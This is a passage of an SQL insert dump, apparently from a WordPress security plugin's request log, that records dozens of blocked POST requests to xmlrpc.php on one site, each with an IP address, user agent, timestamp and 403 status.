Safari\\/537.36\"}','GLJbnu8QCHvhVM93aP6YSo2A',0,1679813040.6409,1602,'','POST',403,0,515,0,1,'',0),('202.61.232.172',3393054892,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/56.0.2924.76 Safari\\/537.36\"}','A0fr38jO6x2cwLUdoYh7PFR4',0,1679813044.5780,1161,'','POST',403,0,515,0,1,'',0),('108.170.11.130',1823083394,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.132 Safari\\/537.36\"}','nhmAJ1LNV9CvZ0dxMcGSHPQU',0,1679813045.1593,1033,'','POST',403,0,515,0,1,'',0),('97.74.229.3',1632298243,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64; rv:73.0) Gecko\\/20100101 Firefox\\/73.0\"}','ekxvHRF5GZWnogLjVrXBmpT4',0,1679813051.9691,690,'','POST',403,0,515,0,1,'',0),('92.205.5.199',1556940231,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko\\/20100101 Firefox\\/84.0\"}','BfmtdQRDWXgc9kUeliuvojz7',0,1679813055.3833,559,'','POST',403,0,515,0,1,'',0),('177.125.60.21',2977774613,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; LM-X420) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','IwTBv4s9FhK3XN1c7i5qaLYW',0,1679813061.7799,1206,'','POST',403,0,515,0,1,'',0),('51.68.230.210',860153554,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/69.0.3497.100 Safari\\/537.36\"}','yCAnTuBv97ebsWcjo12FkPQz',0,1679813062.0731,1145,'','POST',403,0,515,0,1,'',0),('194.243.52.182',3270718646,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:40.0) Gecko\\/20100101 Firefox\\/40.0\"}','Ke3hwotcEm8kjXYy0lpCJsr7',0,1679813072.1414,1641,'','POST',403,0,515,0,1,'',0),('157.7.190.240',2634530544,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','FmlnMQOfwXu8g4ESv51Dkjyq',0,1679813075.5755,581,'','POST',403,0,515,0,1,'',0),('79.137.65.179',1334395315,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.93 Safari\\/537.36\"}','qQhO7N3nGCy4KWStgawDsJM2',0,1679813081.0189,1240,'','POST',403,0,515,0,1,'',0),('5.189.162.27',96313883,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko\\/20100101 Firefox\\/62.0\"}','0yWgF1JIKT589vj4Gb36XRn2',0,1679813081.9468,1467,'','POST',403,0,515,0,1,'',0),('194.113.235.169',3262245801,'','http://cmdev-site1.com/0.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\",\"2\":\"http:\\/\\/cmdev-site1.com\\/0.php\"}','nJ5vgieqG73KA8BVPUyFc6Cf',0,1679818892.6954,1913,'','GET',403,0,700,0,1,'',0),('5.189.162.27',96313883,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; LM-Q710(FGN)) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','NqzmDgWJ6bASFGfuQl3He8ic',0,1679819430.3944,4428,'','POST',403,0,515,0,1,'',0),('82.165.80.126',1386565758,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','TJwnDfjIUltzdF2Z5NKs4pkG',0,1679819436.3187,576,'','POST',403,0,515,0,1,'',0),('82.65.248.18',1380055058,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','38VQmbXheNaq2yt16LnMUBPi',0,1679819443.6701,3169,'','POST',403,0,515,0,1,'',0),('97.107.133.132',1634436484,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/87.0.4280.88 Safari\\/537.36\"}','lyZCgFHjWks1AfDUVcSRxNTE',0,1679819443.6602,3283,'','POST',403,0,515,0,1,'',0),('2.58.82.244',37376756,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 6.0.1; RedMi Note 5 Build\\/RB3N5C; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/68.0.3440.91 Mobile Safari\\/537.36\"}','E14TDyxVo9dahJ3XLlCSwiH5',0,1679819445.3416,2412,'','POST',403,0,515,0,1,'',0),('5.189.162.27',96313883,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/89.0.4389.90 Safari\\/537.36\"}','ftFsbl51KqR8U6kIDjZr4WzO',0,1679819453.6072,579,'','POST',403,0,515,0,1,'',0),('63.250.38.213',1073358549,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:61.0) Gecko\\/20100101 Firefox\\/61.0\"}','SUW9KzA4M5Bf3NIgumGEYhPO',0,1679819455.8948,556,'','POST',403,0,515,0,1,'',0),('66.29.132.64',1109230656,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko\\/20100101 Firefox\\/54.0\"}','9QcSjLXMdEZwua8ICirmWvgk',0,1679819460.5826,1391,'','POST',403,0,515,0,1,'',0),('148.66.128.80',2487386192,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.130 Safari\\/537.36\"}','V2cm9EXBGuZ5pnLirtxhgCOl',0,1679819460.9462,1278,'','POST',403,0,515,0,1,'',0),('74.208.59.252',1255160828,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.93 Safari\\/537.36\"}','6LUqo9JzTBXnRvgHp0dmGYQt',0,1679819972.4055,3449,'','POST',403,0,515,0,1,'',0),('82.65.248.18',1380055058,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/88.0.4324.190 Safari\\/537.36\"}','RowPSh3mHTKZWkIDc0yrunil',0,1679819980.0286,582,'','POST',403,0,515,0,1,'',0),('198.71.230.31',3326600735,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; LM-X420) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','JbflnDBPyFKNgq8EXtoWa3Sm',0,1679823564.1151,1848,'','POST',403,0,515,0,1,'',0),('177.125.60.21',2977774613,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:44.0) Gecko\\/20100101 Firefox\\/44.0\"}','k4ztEbUjC6M53GQmZr1YDIf8',0,1679823563.1209,3633,'','POST',403,0,515,0,1,'',0),('185.243.11.71',3119713095,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.90 Safari\\/537.36\"}','IWmAcx0tXNjQwfZkygr6S3zR',0,1679823566.6929,610,'','POST',403,0,515,0,1,'',0),('184.168.97.231',3098042855,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:17.0) Gecko\\/20100101 Firefox\\/17.0\"}','9LI2S4myGCcXREwPpvKtHdsr',0,1679823570.6065,531,'','POST',403,0,515,0,1,'',0),('74.208.59.202',1255160778,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-N960U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','G26joVJBAhwL8Q41RmiHcXFb',0,1679823577.2438,556,'','POST',403,0,515,0,1,'',0),('164.92.115.99',2757522275,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko\\/20100101 Firefox\\/63.0\"}','EsFtunNcbMk0YfHo1qOQZ4X7',0,1679823578.7872,557,'','POST',403,0,515,0,1,'',0),('185.182.56.34',3115726882,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko\\/20100101 Firefox\\/41.0\"}','n7oblPHNfhTVRDMFWkCB8d5X',0,1679823580.8278,532,'','POST',403,0,515,0,1,'',0),('54.195.75.99',918768483,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko\\/20100101 Firefox\\/43.0\"}','TQZ6UacVroJXd5PjF2S9iD0C',0,1679823587.7441,557,'','POST',403,0,515,0,1,'',0),('178.210.67.162',3000124322,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-G960U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','XzvqAwecy1ONSsp4Zluxr5FI',0,1679823588.6437,541,'','POST',403,0,515,0,1,'',0),('194.163.160.40',3265503272,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.130 Safari\\/537.36\"}','YvRtAWMCi1LxJldh7K6V8faX',0,1679823592.3727,1275,'','POST',403,0,515,0,1,'',0),('51.77.163.64',860726080,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko\\/20100101 Firefox\\/79.0\"}','ilsty5HGNYgApu60xRzFUZCO',0,1679823603.8680,647,'','POST',403,0,515,0,1,'',0),('96.231.235.203',1625811915,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/56.0.2924.76 Safari\\/537.36\"}','pcjqD4K63MSkZmewrXLbax98',0,1679823610.7788,560,'','POST',403,0,515,0,1,'',0),('185.171.24.51',3114997811,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; LM-X420) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','lhU1r5H2GQ8k6nqXAWFzPMZY',0,1679828273.8723,3442,'','POST',403,0,515,0,1,'',0),('157.245.192.133',2650128517,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/65.0.3325.181 Safari\\/537.36\"}','Z3jYuNcnOLqiGXV56dF1t8SH',0,1679828282.9099,565,'','POST',403,0,515,0,1,'',0),('54.195.75.99',918768483,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:36.0) Gecko\\/20100101 Firefox\\/36.0\"}','ipWxA40clgvfo6mOwE5sVUT8',0,1679828288.5340,540,'','POST',403,0,515,0,1,'',0),('37.97.226.64',627171904,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko\\/20100101 Firefox\\/50.0\"}','P6o8dzn3Lwq7pKCeihjT0a9y',0,1679828297.8172,547,'','POST',403,0,515,0,1,'',0),('89.46.109.194',1496214978,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.117 Safari\\/537.36\"}','FonzrxdACiaycpYfP8Dm50VS',0,1679828302.9240,610,'','POST',403,0,515,0,1,'',0),('203.205.21.58',3419215162,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.105 Safari\\/537.36\"}','D6WaCbIOJz8sFdg3Bm9ipUwq',0,1679828304.0201,584,'','POST',403,0,515,0,1,'',0),('167.71.226.185',2806506169,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686; rv:24.0) Gecko\\/20100101 Firefox\\/24.0\"}','tyWO6UJCfe15PIXmRbS0YvBK',0,1679828308.2207,535,'','POST',403,0,515,0,1,'',0),('54.195.75.99',918768483,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.157 Safari\\/537.36\"}','821rdZDacJeUiYBOGpWRKLIb',0,1679828314.3559,1491,'','POST',403,0,515,0,1,'',0),('194.243.52.182',3270718646,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.121 Safari\\/537.36\"}','XJ0IvMcTHfKhEL4yza2VmYPl',0,1679831152.4595,1461,'','POST',403,0,515,0,1,'',0),('184.168.97.231',3098042855,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/88.0.4324.104 Safari\\/537.36\"}','vR8tYoHT5euiKCO0DpxPr1wa',0,1679831158.4599,568,'','POST',403,0,515,0,1,'',0),('54.195.75.99',918768483,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko\\/20100101 Firefox\\/54.0\"}','DQgu18RXOtHlUbGw4mAVFL9B',0,1679831165.8277,938,'','POST',404,0,515,0,1,'',0),('165.22.211.204',2769736652,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','vA9j5tKZgb2H6S01ixREdu7G',0,1679831166.1430,956,'','POST',403,0,515,0,1,'',0),('192.138.189.25',3230317849,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:44.0) Gecko\\/20100101 Firefox\\/44.0\"}','6MmJtrv5YTEGQC8BL42SfViU',0,1679831176.7330,535,'','POST',403,0,515,0,1,'',0),('185.182.56.34',3115726882,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko\\/20100101 Firefox\\/40.1\"}','0tIZWwl3hCaS81zb4NJpcBUn',0,1679831177.9623,539,'','POST',403,0,515,0,1,'',0),('198.71.230.31',3326600735,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:33.0) Gecko\\/20100101 Firefox\\/33.0\"}','9RrTtJedABvYQxnFyuoLG32W',0,1679831182.5924,539,'','POST',403,0,515,0,1,'',0),('216.250.113.146',3640291730,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.130 Safari\\/537.36\"}','wrIpEz5vY9jqb2WoBAsZ4MFh',0,1679831186.2032,560,'','POST',403,0,515,0,1,'',0),('188.68.47.144',3158585232,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.157 Safari\\/537.36\"}','zlfI9EStvQanxNM27WKyRqOr',0,1679831191.6765,1098,'','POST',403,0,515,0,1,'',0),('5.189.162.27',96313883,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64; rv:73.0) Gecko\\/20100101 Firefox\\/73.0\"}','MBSAFpfdTunWrGevUiIHD6w9',0,1679831192.0580,1028,'','POST',403,0,515,0,1,'',0),('194.243.52.182',3270718646,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko\\/20100101 Firefox\\/85.0\"}','j0VSsT6te5BFdQcoPHZua4xb',0,1679831194.7525,566,'','POST',403,0,515,0,1,'',0),('92.223.85.228',1558140388,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/88.0.4240.193 Safari\\/537.36\"}','Eak2ZVzlYXty70WQpGD8IMRm',0,1679835748.1213,523,'','POST',403,0,515,0,1,'',0),('92.223.85.228',1558140388,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/88.0.4240.193 Safari\\/537.36\"}','zbHs41jGTfuwoehQDBIv6CdN',0,1679835751.6464,543,'','POST',403,0,515,0,1,'',0),('96.231.235.203',1625811915,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/61.0.3163.100 Safari\\/537.36\"}','3LTmkSec0KHaIwjiz75Pb9WD',0,1679837906.3721,1509,'','POST',403,0,515,0,1,'',0),('198.71.230.31',3326600735,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.121 Safari\\/537.36\"}','hT8xlu2k7dWAOfD5nRbE1ISq',0,1679837904.1164,4042,'','POST',403,0,515,0,1,'',0),('194.243.52.182',3270718646,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.169 Safari\\/537.36\"}','4iUbGwq1LPAJhW9YsN5FQM2y',0,1679837908.2699,747,'','POST',403,0,515,0,1,'',0),('51.77.163.64',860726080,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/44.0.2403.157 Safari\\/537.36\"}','rzuZBQmtLx8jnYlwsDGMI61E',0,1679837917.9705,608,'','POST',403,0,515,0,1,'',0),('184.168.97.231',3098042855,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/61.0.3163.100 Safari\\/537.36\"}','bcqBS8wUXQPVKu5YephGOtMg',0,1679837932.4628,1386,'','POST',403,0,515,0,1,'',0),('178.210.67.162',3000124322,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko\\/20100101 Firefox\\/78.0\"}','fyn5WJKVaHzxvP6mZpDi2qSA',0,1679837932.6764,1229,'','POST',403,0,515,0,1,'',0),('68.65.123.34',1145142050,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (iPod; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit\\/605.1.15 (KHTML, like Gecko) CriOS\\/91.0.4472.80 Mobile\\/15E148 Safari\\/604.1\"}','uOwNDipGtdTmry5BkC2Eo3QU',0,1679837942.1601,1330,'','POST',403,0,515,0,1,'',0),('45.64.25.22',759175446,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.113 Safari\\/537.36\"}','lPpNoqMSGkQRgUTyEsA81ir3',0,1679837949.3641,1427,'','POST',403,0,515,0,1,'',0),('91.134.248.235',1535572203,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.163 Safari\\/537.36\"}','9JsE47mVFdz2oCxPAX1vHcKB',0,1679837966.5751,605,'','POST',403,0,515,0,1,'',0),('164.92.115.99',2757522275,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.121 Safari\\/537.36\"}','BcftjJmUW1g2376Z85hrYyav',0,1679837971.6871,730,'','POST',403,0,515,0,1,'',0),('198.71.231.8',3326600968,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:60.0) Gecko\\/20100101 Firefox\\/60.0\"}','XKNuROdr82GYVvZWBk3tJ7jI',0,1679841530.5193,3868,'','POST',403,0,515,0,1,'',0),('51.79.177.175',860860847,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/67.0.3396.99 Safari\\/537.36\"}','tR8BqPkZoQWrC3avI9UDeViG',0,1679841535.6425,565,'','POST',403,0,515,0,1,'',0),('136.243.219.190',2297682878,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.88 Safari\\/537.36\"}','9DdSLFONnA4ycev2gqGHPojQ',0,1679841547.0417,1322,'','POST',403,0,515,0,1,'',0),('148.72.245.120',2487809400,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.121 Safari\\/537.36\"}','jblDKaPASBWiVQeGzqEwp7Y9',0,1679841551.9873,617,'','POST',403,0,515,0,1,'',0),('160.153.146.149',2694419093,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/88.0.4324.190 Safari\\/537.36\"}','JDhm9SVPcX7vZ68Inb1CGjxw',0,1679841555.6481,584,'','POST',403,0,515,0,1,'',0),('167.71.226.185',2806506169,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/46.0.2490.71 Safari\\/537.36\"}','L5WeCNXUMPRGIajly68kTmiK',0,1679841556.7453,548,'','POST',403,0,515,0,1,'',0),('103.28.36.122',1729897594,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:60.0) Gecko\\/20100101 Firefox\\/60.0\"}','u9nxGlXBVZTw70dcFamhDYEk',0,1679841560.8476,558,'','POST',403,0,515,0,1,'',0),('203.205.21.58',3419215162,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.149 Safari\\/537.36\"}','XStvzA4Pasldj9COwYBkDG5Q',0,1679841563.0518,602,'','POST',403,0,515,0,1,'',0),('45.119.84.18',762795026,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:58.0) Gecko\\/20100101 Firefox\\/58.0\"}','GgLauUTdCIVMPw3BkRK9DrYl',0,1679841566.7399,587,'','POST',403,0,515,0,1,'',0),('51.68.230.210',860153554,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.113 Safari\\/537.36\"}','U98PDFntxcByqzr53C7mY61i',0,1679848918.7962,3518,'','POST',403,0,515,0,1,'',0),('95.167.178.158',1604825758,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','7BeNwS9RCyrAguGqIc5sLfn3',0,1679848925.9956,566,'','POST',403,0,515,0,1,'',0),('184.168.99.50',3098043186,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko\\/20100101 Firefox\\/47.0\"}','mbURSKDCykVAvEpiuhwQG5Ne',0,1679848932.4791,559,'','POST',403,0,515,0,1,'',0),('134.122.42.249',2256153337,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.117 Safari\\/537.36\"}','3zYABgEqswiT4eO07Lc1jRKS',0,1679848953.9071,1342,'','POST',403,0,515,0,1,'',0),('156.245.57.130',2633316738,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko\\/20100101 Firefox\\/50.0\"}','5SQeklATGEwMgpjhYmRLz8ru',0,1679848954.2632,1244,'','POST',403,0,515,0,1,'',0),('92.205.5.199',1556940231,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko\\/20100101 Firefox\\/43.0\"}','uaP3TLnJ4UF6Kky1bBcQMS0o',0,1679848958.4938,582,'','POST',403,0,515,0,1,'',0),('64.227.108.223',1088646367,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.212 Safari\\/537.36\"}','KV316Azb0h29PCUWe4DiS8nv',0,1679848976.0864,587,'','POST',403,0,515,0,1,'',0),('198.71.231.8',3326600968,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:61.0) Gecko\\/20100101 Firefox\\/61.0\"}','6FxCiwEletQByVa0MX5Prn4z',0,1679852014.2449,5186,'','POST',403,0,515,0,1,'',0),('216.250.113.146',3640291730,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.212 Safari\\/537.36\"}','7OcGQjaPszKBWi9RSe3UFumT',0,1679852020.1500,1054,'','POST',403,0,515,0,1,'',0),('178.210.67.162',3000124322,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; LM-X420) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile 